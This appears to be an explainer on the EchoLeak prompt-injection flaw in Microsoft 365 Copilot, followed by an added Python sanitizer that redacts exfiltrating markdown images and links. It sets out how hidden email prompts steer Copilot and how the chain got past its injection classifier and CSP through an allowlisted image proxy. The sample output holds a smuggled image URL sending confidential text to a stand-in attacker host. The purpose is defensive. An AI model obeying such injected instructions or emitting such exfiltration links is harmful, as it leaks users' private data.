CVE-2025-32711, dubbed 'EchoLeak' or 'Copilot SearchLeak', is a zero-click indirect prompt injection vulnerability in Microsoft 365 Copilot disclosed by Aim Security researchers Pavan Reddy and Aditya Sanjay Gujral in June 2025. Rated critical (CVSS 9.3) by Microsoft, the flaw affects Copilot integrations across Word, Excel, PowerPoint, Outlook, and Teams. The attack embeds hidden prompts in a crafted email; when Copilot retrieves that email into its RAG (retrieval-augmented generation) context, it executes the attacker-controlled instructions and exfiltrates sensitive data - chat logs, OneDrive files, SharePoint content, or Teams messages - to an attacker-controlled server, with no user interaction required. The exploit bypasses Microsoft's XPIA (Cross-Prompt Injection Attempt) classifier, link redaction, and Content Security Policy by routing the exfiltration request through an allowlisted Teams image proxy. Microsoft issued a server-side patch in June 2025 and confirmed that no customer action is required and that there is no known in-the-wild exploitation. Aim Security published a full academic case study at the AAAI Fall Symposium 2025.
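The chain described above hinges on one defensive gap: output filtering that trusted an allowlisted proxy host without looking at where the proxy was told to fetch from. The following is an added example, written for this page and not code from Aim Security, Microsoft, or the Copilot product, of an output-side sanitizer that closes that gap. It inspects the markdown an assistant is about to return, resolves each image or link through proxy-style indirection to its effective destination, and redacts anything that does not land on a first-party host. All hostnames, the proxy path and the query parameter names are hypothetical, and the assistant output it processes is a constructed sample.

```python
"""
Added defensive example (not Microsoft's or Aim Security's code).

One mitigation layer against EchoLeak-style exfiltration: before an assistant's
markdown reaches the client, inspect every image and link reference and redact
any whose *effective* destination is not an allowlisted first-party host.

The lesson from the CVE is that checking only the outer hostname is not enough.
An allowlisted image proxy that takes its real target from a query parameter
lets a smuggled external URL (carrying exfiltrated text in its query string)
pass both link redaction and CSP. So the sanitizer follows proxy indirection
before deciding. Hosts, proxy path and parameter names below are hypothetical.
"""
import re
from urllib.parse import urlparse, parse_qs

# Hypothetical first-party hosts the assistant may reference.
ALLOWED_HOSTS = {"intranet.example.com", "files.example.com"}

# Hypothetical allowlisted image proxy that fetches whatever URL is passed in
# one of these query parameters (the pattern behind the CVE's CSP bypass).
PROXY_HOSTS = {"img-proxy.example.com"}
PROXY_TARGET_PARAMS = ("url", "target")

# Inline markdown image ![alt](url "title") or link [text](url "title").
MD_REF = re.compile(r"(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+\"[^\"]*\")?\)")


def effective_destination(url: str, depth: int = 3) -> str:
    """Follow proxy-style indirection (bounded) to where the URL really points."""
    for _ in range(depth):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if host not in PROXY_HOSTS:
            return url
        qs = parse_qs(parsed.query)  # parse_qs percent-decodes values
        nxt = next((qs[p][0] for p in PROXY_TARGET_PARAMS if qs.get(p)), None)
        if nxt is None:
            return url  # proxy call with no target: treat the proxy itself as the destination
        url = nxt
    return url


def is_allowed(url: str) -> bool:
    """Allow only https references whose final destination is first-party.
    Relative URLs are rejected here; a production filter would resolve them."""
    final = urlparse(effective_destination(url))
    return final.scheme == "https" and (final.hostname or "").lower() in ALLOWED_HOSTS


def sanitize(markdown: str):
    """Return (clean_markdown, blocked_urls) for one assistant response."""
    blocked = []

    def repl(m):
        bang, text, url = m.group(1), m.group(2), m.group(3)
        if is_allowed(url):
            return m.group(0)
        blocked.append(url)
        # An image is a zero-click fetch, so drop it entirely; a link keeps its
        # visible text and loses the destination.
        return "" if bang else text

    return MD_REF.sub(repl, markdown), blocked


# Constructed sample of assistant output containing a smuggled exfiltration image.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n"
    "![logo](https://files.example.com/logo.png)\n"
    "![](https://img-proxy.example.com/fetch?url=https%3A%2F%2Fattacker.example"
    "%2Fc%3Fd%3DQ1%2520budget%2520is%2520confidential)\n"
    "See [the policy](https://intranet.example.com/policy) and "
    "[this](https://attacker.example/landing)."
)

if __name__ == "__main__":
    clean, blocked = sanitize(SAMPLE_OUTPUT)
    print(clean)
    print("blocked:", blocked)
```

The detection signal here is the `blocked` list: in a real deployment each entry is worth logging with the retrieved documents that were in context at the time, since a first-party proxy being asked to fetch an external destination from inside a generated response is exactly the pattern that distinguishes this exfiltration from a normal embedded image.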